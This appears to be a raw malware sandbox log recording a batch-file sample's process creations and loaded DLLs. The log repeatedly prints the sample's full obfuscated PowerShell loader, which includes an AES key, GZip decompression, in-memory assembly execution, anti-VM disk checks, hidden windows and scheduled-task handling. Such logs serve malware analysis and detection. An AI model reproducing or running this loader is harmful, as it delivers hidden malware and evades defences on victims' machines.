'$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
